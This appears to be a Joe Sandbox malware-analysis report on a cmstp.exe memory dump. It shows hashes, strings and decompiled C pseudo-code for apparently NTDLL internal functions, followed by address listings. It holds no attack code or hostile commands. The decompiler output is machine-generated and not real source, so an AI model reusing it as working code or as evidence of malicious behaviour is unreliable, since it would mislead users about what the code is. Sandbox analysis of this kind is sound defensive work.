Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 63441fbf24836df38e7dde91305524a07b29c28685e62b404869e2083d5de66a
Instruction ID: 6c6ed40dbc7854102186314889b6727b0f9c6a163b83de9f7709de071f0d41fd
Opcode Fuzzy Hash: 63441fbf24836df38e7dde91305524a07b29c28685e62b404869e2083d5de66a
Instruction Fuzzy Hash: 4411E6353087038BEB648E1DA79073EF2D7BB85664F28452AE662DBBA0DB74D8018740

Uniqueness

Uniqueness Score: -1.00%

Function 05188DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E05188DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x51b0d50);
				E0512D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E05165720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0512DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0512DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0512D130(_t34, _t39, _t40);
			}

0x05188df1
0x05188df1
0x05188df1
0x05188df1
0x05188df1
0x05188df1
0x05188df3
0x05188df8
0x05188dfd
0x05188e00
0x05188e0e
0x05188e2a
0x05188e36
0x05188e38
0x05188e3c
0x05188e46
0x05188e46
0x05188e36
0x05188e50
0x05188e56
0x05188e59
0x05188e5c
0x05188e60
0x05188e67
0x05188e6d
0x05188e73
0x05188e74
0x05188eb1
0x05188ebd

Strings

Critical error detected %lx, xrefs: 05188E21

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 2ab266ae0cefd8fae8d880abc4e1700abad4ca21bb56f0df1e3b0c2c184334a0
Instruction ID: e06e9ece30a2a3ba1951b491c228261e540c9b374c712e49c5e53ed483090f94
Opcode Fuzzy Hash: 2ab266ae0cefd8fae8d880abc4e1700abad4ca21bb56f0df1e3b0c2c184334a0
Instruction Fuzzy Hash: C6118B75D14348EBDF28DFA8D5097ECBBB1BB04310F60465DD069AB282C3340642CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0516FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0516FF60

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 43af7b836a7b3bf8773821b42540b8f33ed1021944759fb674cde8ecf1f0de98
Instruction ID: fb621928f5aea330847fe9da5bfcca385754590ea236eb424eb450355821bada
Opcode Fuzzy Hash: 43af7b836a7b3bf8773821b42540b8f33ed1021944759fb674cde8ecf1f0de98
Instruction Fuzzy Hash: 31110472A10184EFDB12EB50D949F987BB2FF08704F548084F109AB5A2CB7D99A1DB50

Uniqueness

Uniqueness Score: -1.00%

Function 051A5BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E051A5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x51b1178);
				E0512D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E051A4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0511D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E051A5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x51c60e8;
								if( *0x51c60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x51c60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E05119710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E05116DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0511F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0511F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0511F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0511FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0511FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0511F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0511F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E051A4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0512D130(_t427, _t494, _t511);
				}
			}

0x051a5ba5
0x051a5baa
0x051a5baf
0x051a5bb4
0x051a5bb6
0x051a5bbc
0x051a5bbe
0x051a5bc4
0x051a5bcd
0x051a5bd3
0x051a5bd6
0x051a5bdc
0x051a5be0
0x051a5be3
0x051a5beb
0x051a5bf2
0x051a5bf8
0x051a5bfe
0x051a5c04
0x051a5c0e
0x051a5c18
0x051a5c1f
0x051a5c25
0x051a5c2a
0x051a5c2c
0x051a5c32
0x051a5c3a
0x051a5c3f
0x051a5c42
0x051a5c48
0x051a5c5b
0x051a5c5b
0x051a5c2c
0x051a5cb7
0x051a5cb9
0x051a5cbf
0x051a5cc2
0x051a5cca
0x051a5ccb
0x051a5ccb
0x051a5cd1
0x051a5cd7
0x051a5cda
0x051a5ce1
0x051a5ce4
0x051a5ce7
0x051a5ced
0x051a5cf3
0x051a5cf9
0x051a5cff
0x051a5d08
0x051a5d0a
0x051a5d0e
0x051a5d10
0x00000000
0x00000000
0x051a5d16
0x051a5d1a
0x00000000
0x00000000
0x051a5d20
0x051a5d22
0x051a5d25
0x051a5d2f
0x051a5d2f
0x051a5d33
0x051a5d3d
0x051a5d49
0x051a5d4b
0x00000000
0x00000000
0x051a5d5a
0x051a5d5d
0x051a5d60
0x00000000
0x00000000
0x051a5d66
0x051a5d69
0x00000000
0x00000000
0x051a5d6f
0x051a5d6f
0x051a5d73
0x051a5d79
0x051a5d7f
0x051a5d86
0x051a5d95
0x051a5d98
0x051a5dba
0x051a5dcb
0x051a5dce
0x051a5dd3
0x051a5dd6
0x051a5dd8
0x051a5de6
0x051a5dec
0x051a5dee
0x051a5df1
0x051a5df3
0x051a635a
0x051a635a
0x00000000
0x051a635a
0x051a5dfe
0x051a5e02
0x051a5e05
0x051a5e07
0x051a5e10
0x051a5e13
0x051a5e1b
0x051a5e1c
0x051a5e21
0x051a5e22
0x051a5e23
0x051a5e25
0x051a5e2a
0x051a5e2c
0x051a5e2e
0x051a5e36
0x051a5e39
0x051a5e42
0x051a5e47
0x051a5e4d
0x051a5e54
0x051a5e54
0x051a5e54
0x051a5e2e
0x051a5e5c
0x051a5e5f
0x051a5e62
0x051a5e64
0x051a5e6b
0x051a5e70
0x051a5e7a
0x051a5e7a
0x051a5e7a
0x051a5e6b
0x051a5e7e
0x051a5e7f
0x051a5e7f
0x051a5e81
0x051a5e87
0x051a5e8b
0x051a5e8c
0x051a5e8c
0x051a5e8c
0x051a5e9a
0x051a5e9c
0x051a5ea2
0x051a5ea6
0x051a5f50
0x051a5f50
0x051a5f57
0x051a5f66
0x051a5f66
0x051a5f66
0x051a5f68
0x051a5f6a
0x051a63d0
0x00000000
0x051a5f70
0x051a5f70
0x051a5f91
0x051a5f9c
0x051a5f9e
0x051a5fa4
0x051a5fa6
0x051a638c
0x051a6392
0x051a63a1
0x051a63a7
0x051a63af
0x051a63af
0x051a63bd
0x051a63d8
0x00000000
0x051a63d8
0x051a5fac
0x051a5fb2
0x051a5fb4
0x051a5fbd
0x051a5fc6
0x051a5fce
0x051a5fd4
0x051a5fdc
0x051a5fec
0x051a5fed
0x051a5fee
0x051a5fef
0x051a5ff9
0x051a5ffa
0x051a5ffb
0x051a5ffc
0x051a6000
0x051a6004
0x051a6012
0x051a6012
0x051a6018
0x051a6019
0x051a601a
0x051a601b
0x051a601c
0x051a6020
0x051a6059
0x051a605c
0x051a6061
0x051a6061
0x051a6022
0x051a6022
0x051a6022
0x051a6025
0x051a602a
0x051a602b
0x051a6031
0x051a6037
0x051a6038
0x051a603e
0x051a6048
0x051a6049
0x051a604a
0x051a604b
0x051a604c
0x051a604d
0x051a6053
0x051a6054
0x051a6054
0x051a6062
0x051a6065
0x051a6067
0x051a606a
0x051a6070
0x051a6075
0x051a6076
0x051a6081
0x051a6087
0x051a6095
0x051a6099
0x051a609e
0x051a60a4
0x051a60ae
0x051a60b0
0x051a60b3
0x051a60b6
0x051a60b8
0x051a60ba
0x051a60ba
0x051a60ba
0x051a60ba
0x051a60be
0x051a60c0
0x051a60c5
0x051a60c5
0x051a60c5
0x051a60c6
0x051a60cd
0x051a6114
0x051a60cf
0x051a60cf
0x051a60d4
0x051a60d5
0x051a60da
0x051a60db
0x051a60e1
0x051a60e2
0x051a60e8
0x051a60f8
0x051a60fd
0x051a60fe
0x051a6102
0x051a6104
0x051a6107
0x051a6109
0x051a610b
0x051a610b
0x051a610b
0x051a610b
0x051a610f
0x051a610f
0x051a6117
0x051a611a
0x051a611f
0x051a6125
0x051a6134
0x051a6139
0x051a613f
0x051a6146
0x051a6148
0x051a614b
0x051a614d
0x051a614f
0x051a614f
0x051a614f
0x051a614f
0x051a6153
0x051a6159
0x051a6159
0x051a615c
0x051a6163
0x051a6169
0x051a616c
0x051a6172
0x051a6181
0x051a6186
0x051a6187
0x051a618b
0x051a6191
0x051a6195
0x051a61a3
0x051a61bb
0x051a61c0
0x051a61c3
0x051a61cc
0x051a61d0
0x051a61dc
0x051a61de
0x051a61e1
0x051a61e4
0x051a61e6
0x051a61e8
0x051a61e8
